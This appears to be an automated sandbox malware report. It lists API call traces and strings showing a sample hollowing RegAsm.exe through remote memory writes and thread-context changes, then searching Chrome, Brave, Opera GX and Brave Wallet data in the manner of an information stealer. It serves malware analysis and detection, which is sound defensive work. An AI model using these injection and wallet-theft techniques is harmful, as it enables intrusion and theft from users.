Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	37%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	50%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02AB2139 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02AB20AB,02AB209B), ref: 02AB22A8
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02AB22BB
Wow64GetThreadContext.KERNEL32(00000094,00000000), ref: 02AB22D9
ReadProcessMemory.KERNELBASE(0000008C,?,02AB20EF,00000004,00000000), ref: 02AB22FD
VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 02AB2328
WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 02AB2380
WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 02AB23CB
WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 02AB2409
Wow64SetThreadContext.KERNEL32(00000094,02A00000), ref: 02AB2445
ResumeThread.KERNELBASE(00000094), ref: 02AB2454

Strings

aryA, xrefs: 02AB217F
ReadProcessMemory, xrefs: 02AB2226
SetThreadContext, xrefs: 02AB225F
GetP, xrefs: 02AB21BB
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 02AB22A7
WriteProcessMemory, xrefs: 02AB224C
TerminateProcess, xrefs: 02AB2337
Load, xrefs: 02AB2177
GetThreadContext, xrefs: 02AB2213
ress, xrefs: 02AB21C3
ResumeThread, xrefs: 02AB2275
VirtualAlloc, xrefs: 02AB2200
CreateProcessA, xrefs: 02AB21ED
VirtualAllocEx, xrefs: 02AB2239

Memory Dump Source

Source File: 00000000.00000002.2143614006.0000000002AB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ab1000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: e6cd149dff47e10b12e99a860d0898e9779c30fb51cb0706b61831b870cbb9a1
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 42B1F87660024AAFDB60CF68CC80BDA73A9FF88714F158155EA0CAB351D774FA41CB94

Function 02890C40 Relevance: .3, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2143439436.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43d46558c08dc6b02ae29eacd62ba90261a5c59a24a9bc934e5c8462e2d1e333
Instruction ID: 0b1f4b301ad992ab447efa27ae6bbf5181be7dd377424efc2c52ef44563b25f2
Opcode Fuzzy Hash: 43d46558c08dc6b02ae29eacd62ba90261a5c59a24a9bc934e5c8462e2d1e333
Instruction Fuzzy Hash: F9D1AE78A042599FDF01CFA8C8807EDFBF2AF48314F288569E859E7685C775AD41CB90

Function 02891220 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 028912A0

Memory Dump Source

Source File: 00000000.00000002.2143439436.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 13ce342a305e39213dfec9c781f7e895df7fe091883f0ebb7cba2157b6843bf7
Instruction ID: 3371e4b3cbdc9f425ab225e253bc6096f334975320c6f669eb12c9dd0e1e9e0b
Opcode Fuzzy Hash: 13ce342a305e39213dfec9c781f7e895df7fe091883f0ebb7cba2157b6843bf7
Instruction Fuzzy Hash: 172115B590024A9FDF10DF9AC984ADEFBF4FF48310F108419E919A7250C7756910CFA5

Analysis Process: RegAsm.exePID: 7032, Parent PID: 3492COMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	30

Executed Functions

Function 00418950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,004172CA), ref: 00418964
GetProcAddress.KERNEL32 ref: 0041897B
GetProcAddress.KERNEL32 ref: 00418992
GetProcAddress.KERNEL32 ref: 004189A9
GetProcAddress.KERNEL32 ref: 004189C0
GetProcAddress.KERNEL32 ref: 004189D7
GetProcAddress.KERNEL32 ref: 004189EE
GetProcAddress.KERNEL32 ref: 00418A05
GetProcAddress.KERNEL32 ref: 00418A1C
GetProcAddress.KERNEL32 ref: 00418A33
GetProcAddress.KERNEL32 ref: 00418A4A
GetProcAddress.KERNEL32 ref: 00418A61
GetProcAddress.KERNEL32 ref: 00418A78
GetProcAddress.KERNEL32 ref: 00418A8F
GetProcAddress.KERNEL32 ref: 00418AA6
GetProcAddress.KERNEL32 ref: 00418ABD
GetProcAddress.KERNEL32 ref: 00418AD4
GetProcAddress.KERNEL32 ref: 00418AEB
GetProcAddress.KERNEL32 ref: 00418B02
GetProcAddress.KERNEL32 ref: 00418B19
GetProcAddress.KERNEL32 ref: 00418B30
GetProcAddress.KERNEL32 ref: 00418B47
GetProcAddress.KERNEL32 ref: 00418B5E
GetProcAddress.KERNEL32 ref: 00418B75
GetProcAddress.KERNEL32 ref: 00418B8C
GetProcAddress.KERNEL32 ref: 00418BA3
GetProcAddress.KERNEL32 ref: 00418BBA
GetProcAddress.KERNEL32 ref: 00418BD1
GetProcAddress.KERNEL32 ref: 00418BE8
GetProcAddress.KERNEL32 ref: 00418BFF
GetProcAddress.KERNEL32 ref: 00418C16
GetProcAddress.KERNEL32 ref: 00418C2D
GetProcAddress.KERNEL32 ref: 00418C44
GetProcAddress.KERNEL32 ref: 00418C5B
GetProcAddress.KERNEL32 ref: 00418C72
GetProcAddress.KERNEL32 ref: 00418C89
GetProcAddress.KERNEL32 ref: 00418CA0
GetProcAddress.KERNEL32 ref: 00418CB7
GetProcAddress.KERNEL32 ref: 00418CCE
GetProcAddress.KERNEL32 ref: 00418CE5
GetProcAddress.KERNEL32 ref: 00418CFC
GetProcAddress.KERNEL32 ref: 00418D13
GetProcAddress.KERNEL32 ref: 00418D2A
GetProcAddress.KERNEL32(CreateProcessA), ref: 00418D40
GetProcAddress.KERNEL32(GetThreadContext), ref: 00418D56
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00418D6C
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00418D82
GetProcAddress.KERNEL32(ResumeThread), ref: 00418D98
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00418DAE
GetProcAddress.KERNEL32(SetThreadContext), ref: 00418DC4
LoadLibraryA.KERNEL32(004172CA), ref: 00418DD5
LoadLibraryA.KERNEL32 ref: 00418DE6
LoadLibraryA.KERNEL32 ref: 00418DF7
LoadLibraryA.KERNEL32 ref: 00418E08
LoadLibraryA.KERNEL32 ref: 00418E19
LoadLibraryA.KERNEL32 ref: 00418E2A
LoadLibraryA.KERNEL32 ref: 00418E3B
LoadLibraryA.KERNEL32 ref: 00418E4C
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418E5C
GetProcAddress.KERNEL32(751E0000), ref: 00418E77
GetProcAddress.KERNEL32 ref: 00418E8E
GetProcAddress.KERNEL32 ref: 00418EA5
GetProcAddress.KERNEL32 ref: 00418EBC
GetProcAddress.KERNEL32 ref: 00418ED3
GetProcAddress.KERNEL32(700F0000), ref: 00418EF2
GetProcAddress.KERNEL32 ref: 00418F09
GetProcAddress.KERNEL32 ref: 00418F20
GetProcAddress.KERNEL32 ref: 00418F37
GetProcAddress.KERNEL32 ref: 00418F4E
GetProcAddress.KERNEL32 ref: 00418F65
GetProcAddress.KERNEL32 ref: 00418F7C
GetProcAddress.KERNEL32 ref: 00418F93
GetProcAddress.KERNEL32(753A0000), ref: 00418FAE
GetProcAddress.KERNEL32 ref: 00418FC5
GetProcAddress.KERNEL32 ref: 00418FDC
GetProcAddress.KERNEL32 ref: 00418FF3
GetProcAddress.KERNEL32 ref: 0041900A
GetProcAddress.KERNEL32(76310000), ref: 00419029
GetProcAddress.KERNEL32 ref: 00419040
GetProcAddress.KERNEL32 ref: 00419057
GetProcAddress.KERNEL32 ref: 0041906E
GetProcAddress.KERNEL32 ref: 00419085
GetProcAddress.KERNEL32 ref: 0041909C
GetProcAddress.KERNEL32(76910000), ref: 004190BB
GetProcAddress.KERNEL32 ref: 004190D2
GetProcAddress.KERNEL32 ref: 004190E9
GetProcAddress.KERNEL32 ref: 00419100
GetProcAddress.KERNEL32 ref: 00419117
GetProcAddress.KERNEL32 ref: 0041912E
GetProcAddress.KERNEL32 ref: 00419145
GetProcAddress.KERNEL32 ref: 0041915C
GetProcAddress.KERNEL32 ref: 00419173
GetProcAddress.KERNEL32(75B30000), ref: 0041918E
GetProcAddress.KERNEL32 ref: 004191A5
GetProcAddress.KERNEL32 ref: 004191BC
GetProcAddress.KERNEL32 ref: 004191D3
GetProcAddress.KERNEL32 ref: 004191EA
GetProcAddress.KERNEL32(75670000), ref: 00419205
GetProcAddress.KERNEL32 ref: 0041921C
GetProcAddress.KERNEL32(76AC0000), ref: 00419237
GetProcAddress.KERNEL32 ref: 0041924E
GetProcAddress.KERNEL32(6F4E0000), ref: 0041926D
GetProcAddress.KERNEL32 ref: 00419284
GetProcAddress.KERNEL32 ref: 0041929B
GetProcAddress.KERNEL32 ref: 004192B2
GetProcAddress.KERNEL32 ref: 004192C9
GetProcAddress.KERNEL32 ref: 004192E0
GetProcAddress.KERNEL32 ref: 004192F7
GetProcAddress.KERNEL32 ref: 0041930E
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00419324
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041933A
GetProcAddress.KERNEL32(75AE0000), ref: 00419355
GetProcAddress.KERNEL32 ref: 0041936C
GetProcAddress.KERNEL32 ref: 00419383
GetProcAddress.KERNEL32 ref: 0041939A
GetProcAddress.KERNEL32(76300000), ref: 004193B5
GetProcAddress.KERNEL32(6CA40000), ref: 004193D0
GetProcAddress.KERNEL32 ref: 004193E7
GetProcAddress.KERNEL32 ref: 004193FE
GetProcAddress.KERNEL32 ref: 00419415
GetProcAddress.KERNEL32(6C850000,SymMatchString), ref: 0041942F

Strings

dbghelp.dll, xrefs: 00418E52
HttpQueryInfoA, xrefs: 00419314
SymMatchString, xrefs: 00419429
WriteProcessMemory, xrefs: 00418D9E
CreateProcessA, xrefs: 00418D30
ReadProcessMemory, xrefs: 00418D5C
InternetSetOptionA, xrefs: 0041932A
VirtualAllocEx, xrefs: 00418D72
GetThreadContext, xrefs: 00418D46
ResumeThread, xrefs: 00418D88
SetThreadContext, xrefs: 00418DB4

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19

Function 00414CC8 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 297
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414D1C
FindFirstFileA.KERNEL32(?,?), ref: 00414D33
_memset.LIBCMT ref: 00414D4F
_memset.LIBCMT ref: 00414D60
StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
wsprintfA.USER32 ref: 00414DC2
StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
wsprintfA.USER32 ref: 00414DFF
wsprintfA.USER32 ref: 00414E16

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181

_memset.LIBCMT ref: 00414E28
lstrcatA.KERNEL32(?,?), ref: 00414E3D
strtok_s.MSVCRT ref: 00414E82
_memset.LIBCMT ref: 00414E94
lstrcatA.KERNEL32(?,?), ref: 00414EA9
strtok_s.MSVCRT ref: 00414EC2
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
strtok_s.MSVCRT ref: 00414FE7
FindNextFileA.KERNELBASE(?,?), ref: 00415105
FindClose.KERNEL32(?), ref: 00415125

Strings

%s\*.*, xrefs: 00414D10
%s\%s, xrefs: 00414DBC
%s\%s\%s, xrefs: 00414DF9
%s\%s, xrefs: 00414E10

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcatwsprintf$FileFindlstrcpystrtok_s$CloseCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 2867719434-332874205
Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55

Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E

CopyFileA.KERNEL32(?,?,00000001,004371C4,004367CF,?,?,?), ref: 00408941

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
lstrlenA.KERNEL32(?), ref: 00408CF0
lstrlenA.KERNEL32(?), ref: 00408D0B

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

DeleteFileA.KERNEL32(?), ref: 00408D4E

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00408B8F

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 2819533921-2709115261
Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98

Function 00409D1C Relevance: 40.9, APIs: 18, Strings: 5, Instructions: 610
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
StrCmpCA.SHLWAPI(?), ref: 0040A1FC
StrCmpCA.SHLWAPI(?), ref: 0040A266
StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

StrCmpCA.SHLWAPI(?), ref: 0040A35C
CopyFileA.KERNEL32(?,?,00000001,0043738C,004367FB), ref: 0040A41C
StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
DeleteFileA.KERNEL32(?), ref: 0040A522

Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF

Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B

StrCmpCA.SHLWAPI(?), ref: 0040A553
CopyFileA.KERNEL32(?,?,00000001,004373A0,00436802), ref: 0040A613
DeleteFileA.KERNEL32(?), ref: 0040A6AA

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

FindNextFileA.KERNEL32(?,?), ref: 0040A76E
FindClose.KERNEL32(?), ref: 0040A782

Strings

Preferences, xrefs: 0040A023
\BraveWallet\Preferences, xrefs: 0040A105
Brave, xrefs: 0040A00D
Opera GX, xrefs: 00409E8B
Google Chrome, xrefs: 0040A4B9

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpylstrlen$Find$CopyDeletelstrcat$CloseFirstNextSystemTime
String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 3650549319-1189830961
Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89

Function 6C5135A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C59F688,00001000), ref: 6C5135D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5135E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C5135FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C51363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C51369F
__aulldiv.LIBCMT ref: 6C5136E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C513773
EnterCriticalSection.KERNEL32(6C59F688), ref: 6C51377E
LeaveCriticalSection.KERNEL32(6C59F688), ref: 6C5137BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C5137C4
EnterCriticalSection.KERNEL32(6C59F688), ref: 6C5137CB
LeaveCriticalSection.KERNEL32(6C59F688), ref: 6C513801
__aulldiv.LIBCMT ref: 6C513883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C513902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C513918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C51394C

Strings

QPC, xrefs: 6C5138FC
GTC, xrefs: 6C513912
AuthcAMDenti, xrefs: 6C513946
MOZ_TIMESTAMP_MODE, xrefs: 6C5135DB
GenuntelineI, xrefs: 6C513639

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
